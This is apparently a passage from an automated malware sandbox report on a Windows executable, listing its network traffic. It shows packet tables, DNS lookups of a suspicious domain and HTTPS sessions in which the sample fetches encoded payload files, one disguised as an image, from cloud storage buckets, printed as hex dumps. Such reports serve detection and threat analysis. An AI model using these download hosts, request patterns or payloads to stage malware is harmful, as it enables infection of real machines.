Jan 13, 2025 13:55:46.816581964 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.816673994 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.838771105 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.838818073 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.838829041 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.838870049 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.838875055 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.838903904 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.838910103 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.838932991 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.838936090 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.838958025 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.839005947 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.839467049 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.839512110 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.841624022 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.841691017 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.842272997 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.842542887 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.844496012 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.844574928 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.849093914 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.849219084 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.851465940 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.851593971 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.856421947 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.856533051 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.858346939 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.858481884 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.860738039 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.860805035 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.865339041 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.865416050 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.867816925 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.867958069 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.872410059 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.872554064 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.874761105 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.875056982 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.879498959 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.879654884 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.881692886 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.881755114 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.883985996 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.884069920 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.891767979 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.891818047 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.891866922 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.891875029 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.891895056 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.892456055 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.895683050 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.895821095 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.897900105 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.898250103 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.900310040 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.900422096 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.905002117 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.905088902 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.907358885 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.907459021 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.912548065 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.912630081 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.914319038 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.914408922 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.916666985 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.916754007 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.921335936 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.921468019 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.923646927 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.923717976 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.928400040 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.928540945 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.930623055 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.930692911 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.935369968 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.935745001 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.937516928 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.937634945 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.939872026 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.939939022 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.945314884 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.945398092 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.946897984 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.946968079 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:46.951494932 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:46.951567888 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.068151951 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:47.068289995 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.068346977 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:47.068387985 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:47.068403006 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.068412066 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:47.068428993 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.068458080 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.070269108 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:47.070326090 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.072072029 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:47.072149038 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.076400042 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:47.076469898 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.078537941 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:47.078608990 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.082185030 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:47.082272053 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.086550951 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:47.086641073 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.088198900 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:47.088300943 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.090421915 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:47.090503931 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:47.090523958 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.090543032 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.091588020 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.091599941 CET	443	50016	118.178.60.9	192.168.2.4
Jan 13, 2025 13:55:47.091609001 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:47.091655016 CET	50016	443	192.168.2.4	118.178.60.9
Jan 13, 2025 13:55:51.745249033 CET	50018	8917	192.168.2.4	8.210.209.78
Jan 13, 2025 13:55:51.750184059 CET	8917	50018	8.210.209.78	192.168.2.4
Jan 13, 2025 13:55:51.750267029 CET	50018	8917	192.168.2.4	8.210.209.78
Jan 13, 2025 13:55:52.256232023 CET	50018	8917	192.168.2.4	8.210.209.78
Jan 13, 2025 13:55:52.261157036 CET	8917	50018	8.210.209.78	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:54:06.573684931 CET	50482	53	192.168.2.4	1.1.1.1
Jan 13, 2025 13:54:06.627696991 CET	53	50482	1.1.1.1	192.168.2.4
Jan 13, 2025 13:55:13.357270956 CET	60714	53	192.168.2.4	1.1.1.1
Jan 13, 2025 13:55:14.098292112 CET	53	60714	1.1.1.1	192.168.2.4
Jan 13, 2025 13:55:51.310395002 CET	55211	53	192.168.2.4	1.1.1.1
Jan 13, 2025 13:55:51.322869062 CET	53	55211	1.1.1.1	192.168.2.4
Jan 13, 2025 13:55:57.362967968 CET	57176	53	192.168.2.4	1.1.1.1
Jan 13, 2025 13:55:57.373676062 CET	53	57176	1.1.1.1	192.168.2.4
Jan 13, 2025 13:56:03.405766010 CET	55158	53	192.168.2.4	1.1.1.1
Jan 13, 2025 13:56:03.417679071 CET	53	55158	1.1.1.1	192.168.2.4
Jan 13, 2025 13:56:09.456825972 CET	55596	53	192.168.2.4	1.1.1.1
Jan 13, 2025 13:56:09.465662003 CET	53	55596	1.1.1.1	192.168.2.4
Jan 13, 2025 13:56:15.488059998 CET	50928	53	192.168.2.4	1.1.1.1
Jan 13, 2025 13:56:15.497963905 CET	53	50928	1.1.1.1	192.168.2.4
Jan 13, 2025 13:56:21.519542933 CET	57061	53	192.168.2.4	1.1.1.1
Jan 13, 2025 13:56:21.551160097 CET	53	57061	1.1.1.1	192.168.2.4
Jan 13, 2025 13:56:27.581898928 CET	63203	53	192.168.2.4	1.1.1.1
Jan 13, 2025 13:56:27.589561939 CET	53	63203	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 13:54:06.573684931 CET	192.168.2.4	1.1.1.1	0xb953	Standard query (0)	khec3y.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:55:13.357270956 CET	192.168.2.4	1.1.1.1	0x5c70	Standard query (0)	22mm.oss-cn-hangzhou.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:55:51.310395002 CET	192.168.2.4	1.1.1.1	0x8db6	Standard query (0)	gnkygm.net	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:55:57.362967968 CET	192.168.2.4	1.1.1.1	0x5e24	Standard query (0)	gnkygm.net	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:56:03.405766010 CET	192.168.2.4	1.1.1.1	0x38f1	Standard query (0)	gnkygm.net	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:56:09.456825972 CET	192.168.2.4	1.1.1.1	0x7a47	Standard query (0)	gnkygm.net	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:56:15.488059998 CET	192.168.2.4	1.1.1.1	0x2f84	Standard query (0)	gnkygm.net	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:56:21.519542933 CET	192.168.2.4	1.1.1.1	0x6a6f	Standard query (0)	gnkygm.net	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:56:27.581898928 CET	192.168.2.4	1.1.1.1	0x69f1	Standard query (0)	gnkygm.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 13:54:06.627696991 CET	1.1.1.1	192.168.2.4	0xb953	No error (0)	khec3y.oss-cn-beijing.aliyuncs.com		59.110.190.21	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:55:14.098292112 CET	1.1.1.1	192.168.2.4	0x5c70	No error (0)	22mm.oss-cn-hangzhou.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 13:55:14.098292112 CET	1.1.1.1	192.168.2.4	0x5c70	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 13:55:14.098292112 CET	1.1.1.1	192.168.2.4	0x5c70	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		118.178.60.9	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:55:51.322869062 CET	1.1.1.1	192.168.2.4	0x8db6	Name error (3)	gnkygm.net	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:55:57.373676062 CET	1.1.1.1	192.168.2.4	0x5e24	Name error (3)	gnkygm.net	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:56:03.417679071 CET	1.1.1.1	192.168.2.4	0x38f1	Name error (3)	gnkygm.net	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:56:09.465662003 CET	1.1.1.1	192.168.2.4	0x7a47	Name error (3)	gnkygm.net	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:56:15.497963905 CET	1.1.1.1	192.168.2.4	0x2f84	Name error (3)	gnkygm.net	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:56:21.551160097 CET	1.1.1.1	192.168.2.4	0x6a6f	Name error (3)	gnkygm.net	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:56:27.589561939 CET	1.1.1.1	192.168.2.4	0x69f1	Name error (3)	gnkygm.net	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

khec3y.oss-cn-beijing.aliyuncs.com

22mm.oss-cn-hangzhou.aliyuncs.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	59.110.190.21	443	7448	C:\Users\user\Desktop\149876985-734579485.05.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:54:08 UTC	106	OUT	GET /i.dat HTTP/1.1 User-Agent: 3M Host: khec3y.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-13 12:54:08 UTC	557	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 12:54:08 GMT Content-Type: application/octet-stream Content-Length: 512 Connection: close x-oss-request-id: 67850CF07FFDC230374D11B4 Accept-Ranges: bytes ETag: "0C3C81CC59CB35FD96753C541097C3E8" Last-Modified: Mon, 13 Jan 2025 11:35:41 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 3631752626051349015 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: DDyBzFnLNf2WdTxUEJfD6A== x-oss-server-time: 1
2025-01-13 12:54:08 UTC	512	IN	Data Raw: 07 1b 1b 1f 6c 25 30 30 5b 58 55 53 60 2a 7d 3c 4f 4f 11 5f 31 72 3d 3a 53 50 53 54 33 7a 35 38 51 41 4d 56 35 25 78 35 5a 58 1a 54 7a 33 3d 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 5a 46 46 42 31 78 6d 6d 06 05 08 0e 3d 77 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 58 5b 56 50 63 29 7e 3f 4c 4c 12 5c 32 71 3e 39 50 53 50 57 30 79 36 3b 52 42 4e 55 36 26 7b 36 59 5b 19 55 7b 32 3c 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 5b 47 47 43 30 79 6c 6c 07 04 09 0f 3c 76 21 Data Ascii: l%00[XUS`*}<OO_1r=:SPST3z58QAMV5%x5ZXTz3=222222222222222222222222222222222ZFFB1xmm=w aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33X[VPc)~?LL\2q>9PSPW0y6;RBNU6&{6Y[U{2<333333333333333333333333333333333[GGC0yll<v!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	59.110.190.21	443	7448	C:\Users\user\Desktop\149876985-734579485.05.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:54:09 UTC	106	OUT	GET /a.gif HTTP/1.1 User-Agent: 3M Host: khec3y.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-13 12:54:10 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 12:54:10 GMT Content-Type: image/gif Content-Length: 135589 Connection: close x-oss-request-id: 67850CF2A645AE38347B19AC Accept-Ranges: bytes ETag: "0DDD3F02B74B01D739C45956D8FD12B7" Last-Modified: Mon, 13 Jan 2025 11:34:41 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 8642451798640735006 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw== x-oss-server-time: 2
2025-01-13 12:54:10 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-13 12:54:10 UTC	4096	IN	Data Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87 Data Ascii: Xgf%a(\|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\aU##l3]x(c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg\|M[mm&}!rt=b!){{4{e5\|8
2025-01-13 12:54:10 UTC	4096	IN	Data Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92 Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
2025-01-13 12:54:10 UTC	4096	IN	Data Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea Data Ascii: c}.0VmO2O?:G6O#y;10[XhvX&+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz\|7I}r@\|
2025-01-13 12:54:10 UTC	4096	IN	Data Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55 Data Ascii: /r+.'wH:M7N0]%'Me"!pu\|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
2025-01-13 12:54:10 UTC	4096	IN	Data Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92 Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)\|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#\|1-PWlno<\|vwx1P]LHXEI
